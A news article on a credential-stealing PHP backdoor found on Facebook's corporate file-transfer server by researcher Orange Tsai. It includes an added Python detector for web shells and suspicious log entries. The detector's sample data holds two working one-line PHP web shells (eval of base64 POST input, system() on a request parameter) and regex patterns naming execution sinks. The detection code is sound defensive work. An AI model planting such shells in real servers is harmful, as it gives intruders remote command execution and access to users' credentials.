Facebook Server Had Backdoor Script Installed By Hackers


Facebook’s corporate server was targeted by hackers looking to steal employees’ log-in credentials, and they succeeded in installing a backdoor script on it. Facebook is one of the biggest web companies in the world, so breaking into its systems is a dream for attackers: it would open the door to almost unlimited possibilities.


How Facebook found the bug

A white-hat hacker named Orange Tsai helped Facebook detect the bug and deal with it. Tsai works as a security researcher for DEVCORE, a Taiwanese security vendor. He was hunting for bugs in the hope of earning a bounty and discovered the script by accident. He went about it methodically.

First, he looked into Facebook’s IP address space, which led him to the domain files.fb.com, and found that this domain was hosting a vulnerable instance of Accellion’s Secure File Transfer application (FTA). Facebook employees use this domain for communication and file sharing.

“When I was doing some recon and research, not only did I look up the domain names of Facebook itself, but also tried Reverse Whois. And to my surprise, I found an INTERESTING domain name,” Tsai noted in a blog post.

Investigating further, Tsai found a total of seven bugs and used them to gain access to Facebook’s server. Once in, he began reviewing the existing log data on the server. While compiling it all into a report, Tsai detected a PHP-based backdoor, a PHP web shell, that hackers had probably set up on the server earlier.
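The log review and web-shell discovery described above, written up as an added example that is not Tsai’s tooling or Facebook’s own code: a Python script that flags PHP files combining a code-execution sink with request input, and access-log entries showing POSTs to PHP paths outside the known site map. The file contents, paths, IP addresses and log lines are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample: PHP files as (path, source) pairs. One is benign, two look like web shells.
SAMPLE_PHP_FILES = {
    "/var/www/html/index.php": "<?php\necho 'Welcome';\n",
    "/var/www/html/uploads/.cache.php": "<?php\n@eval(base64_decode($_POST['c']));\n",
    "/var/www/html/admin/tools.php": "<?php\nif(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}\n",
}

# Constructed sample access log in combined format (IPs from documentation ranges).
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [03/Feb/2016:10:01:12 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Feb/2016:10:01:30 +0000] "GET /login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [03/Feb/2016:10:02:01 +0000] "POST /uploads/.cache.php HTTP/1.1" 200 17 "-" "python-requests/2.9"
198.51.100.9 - - [03/Feb/2016:10:02:05 +0000] "POST /uploads/.cache.php HTTP/1.1" 200 33 "-" "python-requests/2.9"
198.51.100.9 - - [04/Feb/2016:02:15:44 +0000] "POST /uploads/.cache.php HTTP/1.1" 200 90 "-" "python-requests/2.9"
"""

# Source-level indicators: a code-execution sink, request input, and common decoding wrappers.
SINK_RE = re.compile(r"\b(eval|system|exec|shell_exec|passthru|assert|popen|proc_open)\s*\(", re.I)
INPUT_RE = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")
OBFUSCATION_RE = re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I)


def score_php_source(src: str) -> dict:
    """Return which indicator classes appear in one PHP source text."""
    return {
        "sink": bool(SINK_RE.search(src)),
        "request_input": bool(INPUT_RE.search(src)),
        "obfuscation": bool(OBFUSCATION_RE.search(src)),
    }


def suspicious_php_files(files: dict) -> list:
    """Flag files where an execution sink and request-controlled input co-occur."""
    flagged = []
    for path, src in files.items():
        hits = score_php_source(src)
        if hits["sink"] and hits["request_input"]:
            flagged.append(path)
    return sorted(flagged)


LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_access_log(text: str) -> list:
    """Parse combined-format log lines into dicts; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def posts_to_unknown_php(entries: list, known_paths: set) -> dict:
    """Summarise POSTs to .php paths that are not part of the known site map.

    Returns path -> {"count", "first_seen", "ips"}; first_seen gives the timeline
    anchor for when the suspect script started receiving traffic.
    """
    summary = {}
    ips = defaultdict(set)
    for e in entries:
        path = e["path"].split("?", 1)[0]
        if e["method"] != "POST" or not path.endswith(".php") or path in known_paths:
            continue
        rec = summary.setdefault(path, {"count": 0, "first_seen": e["ts"]})
        rec["count"] += 1
        ips[path].add(e["ip"])
    for path, rec in summary.items():
        rec["ips"] = sorted(ips[path])
    return summary


if __name__ == "__main__":
    print("Suspect PHP files:", suspicious_php_files(SAMPLE_PHP_FILES))
    entries = parse_access_log(SAMPLE_ACCESS_LOG)
    print("POSTs to unknown PHP paths:", posts_to_unknown_php(entries, {"/index.php", "/login.php"}))
```

The two checks complement each other: the source scan finds a shell that has never been called, while the log scan finds one whose file has since been removed or renamed, and the first-seen timestamp is what a responder needs to scope how long credentials may have been harvested.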

No harm done

Tsai then reported the issue to Facebook’s security team, submitting the vulnerability details together with the logs, screenshots and a timeline. For his efforts, Tsai received a $10,000 reward from the social networking giant.

In a blog post last week, Tsai said, “At the time I discovered these, there were around 300 logged credentials dated between February 1st to 7th, mostly ‘@fb.com’ and ‘@facebook.com’. Upon seeing it I thought it’s a pretty serious security incident.”

Based on Tsai’s findings, Facebook established that malicious hackers had penetrated the server and installed a backdoor to steal employees’ log-in credentials and details. Facebook users were not affected, however, because the script was installed on the corporate server and not on the primary server that faces the public.